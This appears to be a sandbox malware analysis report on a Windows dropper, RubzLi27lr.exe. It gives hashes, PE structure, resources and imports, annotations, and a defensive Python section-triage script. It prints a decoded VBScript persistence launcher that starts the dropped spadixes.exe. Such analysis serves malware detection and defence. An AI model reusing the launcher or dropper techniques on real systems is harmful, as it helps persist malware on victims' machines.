SHA-512:B922AFCAFEFD047E319DC2B4806BD9846B4B4B482EE17CB200AB581D2CCF35138CD0E264ACE05D6A284B3D1CF176F9EBD886C45E2A7E3F58E6F34B8B6C614E2C
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 68%
Reputation:low
Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L...u.ag..........".................w.............@.......................................@...@.......@.....................d...|....@...I.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc....I...@...J..................@..@.reloc...u.......v...>..............@..B........................................................................................................................................................................................................................................................................
Note: MD5, SHA1 and SHA-256 are identical to the submitted sample RubzLi27lr.exe, so this record is the dropper writing a copy of itself; the same hash therefore covers both the original and the dropped copy when hunting.
Process:C:\Users\user\AppData\Local\Hegeleos\spadixes.exe
File Type:data
Category:dropped
Size (bytes):115588
Entropy (8bit):7.799477513269117
Encrypted:false
SSDEEP:3072:H5CLsA4a9Psci4Q7xubODnseF24eTFqmD:Q9Pst4iMeseYLD
MD5:DB2AD08692705AAD98009A1D300B468A
SHA1:428842A4C7AE9763D70DFA54811C6C74ADA41727
SHA-256:11B7C600E48017E243712E1E51F8ADC8ACB4742BAF5C815A04A987CF4073A2AF
SHA-512:03881A3804DB80E09255376853D5512B2D7F3C34458104C052617E6E49F95CE1B61E53091BF56BC220A4FD196C42B3A35D70388ADEC9542879FDBAA8F92002F7
Malicious:false
Reputation:low
Preview:EA06..<....t..N.G..)..*mF.Tit.......).Y....!........+...g...l....K.2+\.<..f..d.S[.Jd..L.'!..n.....z....|.;^..n ...E)t..J.G.u{....t.uJ5z...R"s*5B...\R.L.E@...<.@.Q....o6.U.$3Q........Pb.5.p....*gC..k..D....0..."T.U..A.R)..(...... .P....@P..;].. .....%3I...t..X.0...H...=h......qP..(T..... P....H......{.S ...j..... *@..>d...B&.h .....Pj.x...3.A>..U/.W......m@.}i4.X....m....]&....1P..f.Z.<..R..........u..+.....6. .\.@......... W......i.;..gS.[nu.u..5.S*..,.#S.Sz..e2.F....]"gS.M...7"l.@H...g.C..)..p...R.S{.2.V.V.T...Si....:...S.S*.(..x...S....U..4..z....:...z.O."..$.@I..,.2.H.....8.A....D.;F.\.`...U.[.TY..{..j...n.U.Y..i...z.."2....g.X.sN5~.K.Fn2....g.G.......,.......[.R..*gW....).`..../v....V.......CT...E...F.a..i.^. ....-.*...%.....2.N..@H...gS.Q...d..@T.....m..&P...q...)....E.R(..uB.A.h.i...L.P...5B.K.[juK~....M.H..1......<..C.....G...Jt.....#v....z.O.(.B`...(.}uf.H..(.9d....P.. ..yF.k....N.E.Ky.*..q...).p...Z..@,...H.K. *.......7Z.....0#...
Note: "File Type: data" only means no libmagic rule matched. The preview opens with EA06, the version tag carried by AutoIt3 compiled-script data, which fits the report's compiled-AutoIt-script signature, and the entropy of 7.80 is what a compressed or encrypted script body looks like. "Malicious: false" reflects the absence of engine hits on this blob, not a judgement that it is harmless.
Process:C:\Users\user\Desktop\RubzLi27lr.exe
File Type:data
Category:dropped
Size (bytes):115588
Entropy (8bit):7.799477513269117
Encrypted:false
SSDEEP:3072:H5CLsA4a9Psci4Q7xubODnseF24eTFqmD:Q9Pst4iMeseYLD
MD5:DB2AD08692705AAD98009A1D300B468A
SHA1:428842A4C7AE9763D70DFA54811C6C74ADA41727
SHA-256:11B7C600E48017E243712E1E51F8ADC8ACB4742BAF5C815A04A987CF4073A2AF
SHA-512:03881A3804DB80E09255376853D5512B2D7F3C34458104C052617E6E49F95CE1B61E53091BF56BC220A4FD196C42B3A35D70388ADEC9542879FDBAA8F92002F7
Malicious:false
Reputation:low
Preview:EA06..<....t..N.G..)..*mF.Tit.......).Y....!........+...g...l....K.2+\.<..f..d.S[.Jd..L.'!..n.....z....|.;^..n ...E)t..J.G.u{....t.uJ5z...R"s*5B...\R.L.E@...<.@.Q....o6.U.$3Q........Pb.5.p....*gC..k..D....0..."T.U..A.R)..(...... .P....@P..;].. .....%3I...t..X.0...H...=h......qP..(T..... P....H......{.S ...j..... *@..>d...B&.h .....Pj.x...3.A>..U/.W......m@.}i4.X....m....]&....1P..f.Z.<..R..........u..+.....6. .\.@......... W......i.;..gS.[nu.u..5.S*..,.#S.Sz..e2.F....]"gS.M...7"l.@H...g.C..)..p...R.S{.2.V.V.T...Si....:...S.S*.(..x...S....U..4..z....:...z.O."..$.@I..,.2.H.....8.A....D.;F.\.`...U.[.TY..{..j...n.U.Y..i...z.."2....g.X.sN5~.K.Fn2....g.G.......,.......[.R..*gW....).`..../v....V.......CT...E...F.a..i.^. ....-.*...%.....2.N..@H...gS.Q...d..@T.....m..&P...q...)....E.R(..uB.A.h.i...L.P...5B.K.[juK~....M.H..1......<..C.....G...Jt.....#v....z.O.(.B`...(.}uf.H..(.9d....P.. ..yF.k....N.E.Ky.*..q...).p...Z..@,...H.K. *.......7Z.....0#...
Note: same content (identical hashes, size and preview) as the blob written by spadixes.exe, this time written by the original RubzLi27lr.exe process. Both stages drop the same script blob, so the SHA-256 11B7C600… is a stable artefact of this sample regardless of which process executed.
Process:C:\Users\user\AppData\Local\Hegeleos\spadixes.exe
File Type:data
Category:dropped
Size (bytes):115588
Entropy (8bit):7.799477513269117
Encrypted:false
SSDEEP:3072:H5CLsA4a9Psci4Q7xubODnseF24eTFqmD:Q9Pst4iMeseYLD
MD5:DB2AD08692705AAD98009A1D300B468A
SHA1:428842A4C7AE9763D70DFA54811C6C74ADA41727
SHA-256:11B7C600E48017E243712E1E51F8ADC8ACB4742BAF5C815A04A987CF4073A2AF
SHA-512:03881A3804DB80E09255376853D5512B2D7F3C34458104C052617E6E49F95CE1B61E53091BF56BC220A4FD196C42B3A35D70388ADEC9542879FDBAA8F92002F7
Malicious:false
Reputation:low
Preview:(identical to the preceding spadixes.exe record; same EA06-prefixed content)
Process: C:\Users\user\Desktop\RubzLi27lr.exe
File Type: data
Category: dropped
Size (bytes): 277504
Entropy (8bit): 6.8913047797206675
Encrypted: false
SSDEEP: 6144:bP4T1x0kGFLL2vQM7WFt8hw3C2SiG/Awhz8QbSKbvBqgG:T4Tz0ks2vQM7WFt8hw3C2SiG/Awhz8Qs
MD5: A9D44D9128C6E075588C676B7933C7E8
SHA1: 97C144BC7E81433A97E6DFF111403E5C2D1A0B24
SHA-256: 75D6FEB3628D88E8321C78AE0872AE122ADFC0E22E722EA10EB8546063C407DA
SHA-512: 31EA131FBFA5A7904A9C6BD83DF28DE8A547FD7E8372F408A88669FFC9AEDA7F3A5239D7A5F87DD2EBFCF99F5F83DC5E82A610ACAFFB786711E083653DD8625E
Malicious: false
Reputation: low
Preview: ...J0SVGQPLL..6F.QKJ3SVG.PLLH56FPQKJ3SVGUPLLH56FPQKJ3SVGUPLL.56F^N.D3._.t.M...b.9"k:A<154=l/)[X)$q)/.!#)u9"l.zef=>//.^[MqPLLH56F..KJ.RUG...*H56FPQKJ.STF^Q.LH.2FPEKJ3SVGK.HLH.6FP1OJ3S.GUpLLH76FTQKJ3SVGQPLLH56FP.OJ3QVGUPLLJ5v.PQ[J3CVGUP\LH%6FPQKJ#SVGUPLLH56F..OJ|SVGU0HL_%6FPQKJ3SVGUPLLH56FP.OJ?SVGUPLLH56FPQKJ3SVGUPLLH56FPQKJ3SVGUPLLH56FPQKJ3SVGUpLL@56FPQKJ3SVG]pLL.56FPQKJ3SVG{$)4<56FtuOJ3sVGUvHLH76FPQKJ3SVGUPLLh56&~#88PSVGB@LLHU2FPCKJ3{RGUPLLH56FPQKJsSV.{") 'V6F\QKJ3.RGURLLH.2FPQKJ3SVGUPLL.56.PQKJ3SVGUPLLH56FP.OJ3SVG.PLLJ53F..IJK.WGVPLL.56@..IJ.SVGUPLLH56FPQKJ3SVGUPLLH56FPQKJ3SVGUPLLH56F.,.E...&..LH56FPPII7U^OUPLLH56F.QKJuSVG.PLL.56FuQKJ^SVGqPLL656F.QKJWSVG'PLL)56F.QKJ\SVG;PLL656FNScj3S\msPNdi56LP{.9.SVM.QLLLF.FP[.H3SR4qPLF.66FT"nJ3Y.CUPH?n56L.TKJ7y.GV.ZJH5-)iQK@3P.RSPLWb.6DxkKJ9S|aUS.YN56]zsKH.ZVGQz.?U56@x.KJ9'_GUR.FH52lNSc.3S\mw.GLH1.Fzs5F3SRlUzn2E56B{QaT1.[GUTfn6;6FTzK`.-YGUTgLb+4._QKN.q(WUPHgH..8AQKN.S|e+BLLL.6lr/XJ3W}G.r2XH52mP{i4&SVC~Pfn6#6FTzK`.-AGUTgLb.H^PQOa3yHE.HLLL.0l2Q9j%S&D
Process: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe
File Type: data
Category: dropped
Size (bytes): 280
Entropy (8bit): 3.385617488462878
Encrypted: false
SSDEEP: 6:DMM8lfm3OOQdUfclzXUEZ+lX1qlVpFA36nriIM8lfQVn:DsO+vNlDQ1qnc4mA2n
MD5: 92CE8022D40F4AE1D1FD16F8941AB18E
SHA1: B7709C520B79750E52B0ADABBA4C79A378F12954
SHA-256: B832983EA36004CD8C722EA1EFFCD6415F6525FC8A7E77462DA76EB4A3EC1775
SHA-512: 86E5D7C1090195B6E56788FE2DF9262020132BCFF8C8F68ED7ACC111C4A06B7BE51D7904A6AA74C60D01004E5E2354EE755326B0D1402B33FD8DF78195FA3196
Malicious: true
Preview: S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.H.e.g.e.l.e.o.s.\.s.p.a.d.i.x.e.s...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...
Preview, decoded (the file is UTF-16LE text without a byte-order mark; the report renders each null byte as a dot):
    Set WshShell = CreateObject("WScript.Shell")
    WshShell.Run "C:\Users\engineer\AppData\Local\Hegeleos\spadixes.exe", 1
    Set WshShell = Nothing
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.936211076561911
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: RubzLi27lr.exe
File size: 1'094'656 bytes
MD5: 44f0ea32a5acf017acf1d2a595c615f1
SHA1: ef36981f3271cf8c1a4b16a86b3d5f232337bb93
SHA256: eadcb6ea284444fdf72e7fa141be4a0d9d61d5bdd95bdb353e12c507915de1f8
SHA512: b922afcafefd047e319dc2b4806bd9846b4b4b482ee17cb200ab581d2ccf35138cd0e264ace05d6a284b3d1cf176f9ebd886c45e2a7e3f58e6f34b8b6c614e2c
SSDEEP: 24576:0qDEvCTbMWu7rQYlBQcBiT6rprG8aDHikw:0TvC/MTQYxsWR7aDHik
TLSH: B135BF0273D1C062FFAB92334B5AF6515BBC69260123E61F13981DB9BE701B1563E7A3
File Content Preview: MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
Icon Hash: aaf3e3e3938382a0
Entrypoint: 0x420577
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x6761AC75 [Tue Dec 17 16:53:09 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 948cc502fe9226992dce9417f952fce3
Instruction (disassembly at the entry point, as listed by the report)
    call 00007F7ABCB9B673h
    jmp 00007F7ABCB9AF7Fh
    push ebp
    mov ebp, esp
    push esi
    push dword ptr [ebp+08h]
    mov esi, ecx
    call 00007F7ABCB9B15Dh
    mov dword ptr [esi], 0049FDF0h
    mov eax, esi
    pop esi
    pop ebp
    retn 0004h
    and dword ptr [ecx+04h], 00000000h
    mov eax, ecx
    and dword ptr [ecx+08h], 00000000h
    mov dword ptr [ecx+04h], 0049FDF8h
    mov dword ptr [ecx], 0049FDF0h
    ret
    push ebp
    mov ebp, esp
    push esi
    push dword ptr [ebp+08h]
    mov esi, ecx
    call 00007F7ABCB9B12Ah
    mov dword ptr [esi], 0049FE0Ch
    mov eax, esi
    pop esi
    pop ebp
    retn 0004h
    and dword ptr [ecx+04h], 00000000h
    mov eax, ecx
    and dword ptr [ecx+08h], 00000000h
    mov dword ptr [ecx+04h], 0049FE14h
    mov dword ptr [ecx], 0049FE0Ch
    ret
    push ebp
    mov ebp, esp
    push esi
    mov esi, ecx
    lea eax, dword ptr [esi+04h]
    mov dword ptr [esi], 0049FDD0h
    and dword ptr [eax], 00000000h
    and dword ptr [eax+04h], 00000000h
    push eax
    mov eax, dword ptr [ebp+08h]
    add eax, 04h
    push eax
    call 00007F7ABCB9DD1Dh
    pop ecx
    pop ecx
    mov eax, esi
    pop esi
    pop ebp
    retn 0004h
    lea eax, dword ptr [ecx+04h]
    mov dword ptr [ecx], 0049FDD0h
    push eax
    call 00007F7ABCB9DD68h
    pop ecx
    ret
    push ebp
    mov ebp, esp
    push esi
    mov esi, ecx
    lea eax, dword ptr [esi+04h]
    mov dword ptr [esi], 0049FDD0h
    push eax
    call 00007F7ABCB9DD51h
    test byte ptr [ebp+08h], 00000001h
    pop ecx

Programming Language:
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc8e64 | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd4000 | 0x34900 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x109000 | 0x7594 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb0ff0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xc3400 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb1010 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9c000 | 0x894 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x9ab1d | 0x9ac00 | 0a1473f3064dcbc32ef93c5c8a90f3a6 | False | 0.565500681542811 | data | 6.668273581389308 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9c000 | 0x2fb82 | 0x2fc00 | c9cf2468b60bf4f80f136ed54b3989fb | False | 0.35289185209424084 | data | 5.691811547483722 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xcc000 | 0x706c | 0x4800 | 53b9025d545d65e23295e30afdbd16d9 | False | 0.04356553819444445 | DOS executable (block device driver @\273\) | 0.5846666986982398 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xd4000 | 0x34900 | 0x34a00 | f03d2f8c0acd4bc5627e3df8e95886a0 | False | 0.8781778874703088 | data | 7.774728608518139 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x109000 | 0x7594 | 0x7600 | c68ee8931a32d45eb82dc450ee40efc3 | False | 0.7628111758474576 | data | 6.7972128181359786 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
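The section table is where the header fields listed earlier get sanity-checked. The entry point 0x420577 is RVA 0x20577 from the 0x400000 image base, which lands inside .text (RVA 0x1000, virtual size 0x9ab1d), and the timestamp 0x6761AC75 decodes to the UTC date shown. The two per-section measures are meant to be read together: Entropy (8bit) is Shannon entropy in bits per byte, ZLIB Complexity is compressed size divided by original size, so a value near or above 1.0 means the bytes are already compressed or encrypted and entropy alone cannot tell a packed blob from a repetitive one. That is what .rsrc shows here: 7.77 bits per byte and 0.88 complexity for the section, driven by the 0x2bf97-byte RT_RCDATA item in the resource list below at 1.0003, which occupies most of the 0x34a00-byte section. A compressed payload carried as an RCDATA resource is consistent with the report's compiled-AutoIt verdict. Two caveats when reading these numbers: tiny items such as the 0x14-byte RT_GROUP_ICON exceed 1.0 purely from zlib framing overhead, and the "DOS executable" file type on .data is a libmagic guess on low-entropy initialized data, not evidence of an embedded program. The Python below is an added example, not part of the Joe Sandbox report: it parses a section table with struct alone, computes both measures, locates the section holding the entry point and any overlay appended past the last section, and runs on a constructed two-section PE32 that borrows only the report's TimeDateStamp.

```python
"""Static PE section triage in the spirit of the report's section table (added example)."""
import math
import random
import struct
import zlib
from datetime import datetime, timezone

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy, 0.0 .. 8.0 (the report's 'Entropy (8bit)')."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def zlib_complexity(data: bytes) -> float:
    """Compressed / original size (the report's 'ZLIB Complexity'). Near or above 1.0 means
    already compressed or encrypted; very small inputs also exceed 1.0 from zlib framing."""
    if not data:
        return 0.0
    return len(zlib.compress(data, 9)) / len(data)


def parse_pe(pe: bytes) -> dict:
    """DOS header -> PE signature -> file header -> optional header -> section table."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    fh = e_lfanew + 4
    machine, nsec, tstamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", pe, fh)
    opt = fh + 20
    (magic,) = struct.unpack_from("<H", pe, opt)
    (entry_rva,) = struct.unpack_from("<I", pe, opt + 16)  # AddressOfEntryPoint, PE32 and PE32+
    if magic == 0x10B:
        (image_base,) = struct.unpack_from("<I", pe, opt + 28)
    elif magic == 0x20B:
        (image_base,) = struct.unpack_from("<Q", pe, opt + 24)
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    sections = []
    for i in range(nsec):
        name, vsize, va, rawsize, rawptr, _, _, _, _, flags = struct.unpack_from(
            "<8sIIIIIIHHI", pe, opt + opt_size + 40 * i)
        raw = pe[rawptr:rawptr + rawsize]
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "va": va, "vsize": vsize, "rawsize": rawsize, "rawptr": rawptr,
                         "flags": flags, "entropy": shannon_entropy(raw),
                         "zlib_complexity": zlib_complexity(raw)})
    return {"machine": machine, "timestamp": datetime.fromtimestamp(tstamp, tz=timezone.utc),
            "image_base": image_base, "entry_rva": entry_rva, "sections": sections}


def section_for_rva(sections: list, rva: int):
    for s in sections:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["rawsize"]):
            return s["name"]
    return None  # entry point outside every section is itself a red flag


def triage(pe: bytes) -> dict:
    """The checks a practitioner runs first against a section table."""
    info = parse_pe(pe)
    secs = info["sections"]
    end_of_sections = max((s["rawptr"] + s["rawsize"] for s in secs), default=0)
    return {"entry_section": section_for_rva(secs, info["entry_rva"]),
            "entry_va": info["image_base"] + info["entry_rva"],
            "timestamp_utc": info["timestamp"].strftime("%Y-%m-%d %H:%M:%S"),
            "high_entropy_sections": [s["name"] for s in secs if s["entropy"] > 7.2],
            "writable_executable": [s["name"] for s in secs
                                    if s["flags"] & IMAGE_SCN_MEM_EXECUTE and s["flags"] & IMAGE_SCN_MEM_WRITE],
            "overlay_bytes": len(pe) - end_of_sections}


def build_sample_pe() -> bytes:
    """Constructed two-section PE32 for demonstration only, not a real binary.
    The TimeDateStamp is the value the report shows for RubzLi27lr.exe."""
    rng = random.Random(7)
    text = b"\x90" * 0x200                                    # NOP sled: entropy 0, compresses to nothing
    rsrc = bytes(rng.getrandbits(8) for _ in range(0x1000))    # pseudo-random: ~8 bits/byte, incompressible
    e_lfanew, opt_size = 0x40, 0xE0
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 2, 0x6761AC75, 0, 0, opt_size, 0x0102)
    opt_hdr = struct.pack("<HBBIIIIIII", 0x10B, 9, 0, len(text), len(rsrc), 0,
                          0x1077, 0x1000, 0x2000, 0x400000)   # entry RVA 0x1077 sits in .text
    opt_hdr += b"\0" * (opt_size - len(opt_hdr))
    sec = struct.pack("<8sIIIIIIHHI", b".text", 0x200, 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    sec += struct.pack("<8sIIIIIIHHI", b".rsrc", 0x1000, 0x2000, 0x1000, 0x400, 0, 0, 0, 0, 0x40000040)
    headers = dos + b"PE\0\0" + file_hdr + opt_hdr + sec
    headers += b"\0" * (0x200 - len(headers))
    return headers + text + rsrc + b"OVERLAY!"  # 8 bytes appended past the last section


if __name__ == "__main__":
    for k, v in triage(build_sample_pe()).items():
        print(f"{k}: {v}")
```

The constructed .rsrc scores about 7.95 bits per byte with a complexity just above 1.0, the profile of the real sample's RT_RCDATA item; a byte sequence that cycles through all 256 values scores a perfect 8.0 entropy yet compresses to a few percent of its size, which is why the report lists both columns.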
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xd44a0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xd45c8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xd48b0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xd49d8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xd5880 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xd6128 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xd6690 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xd8c38 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xd9ce0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_STRING | 0xda148 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xda6dc | 0x68a | data | English | Great Britain | 0.2735961768219833
RT_STRING | 0xdad68 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xdb1f8 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xdb7f4 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xdbe50 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xdc2b8 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xdc410 | 0x2bf97 | data | | | 1.0003386649936985
RT_GROUP_ICON | 0x1083a8 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x108420 | 0x14 | data | English | Great Britain | 1.15
RT_VERSION | 0x108434 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x108510 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll | HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll | DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
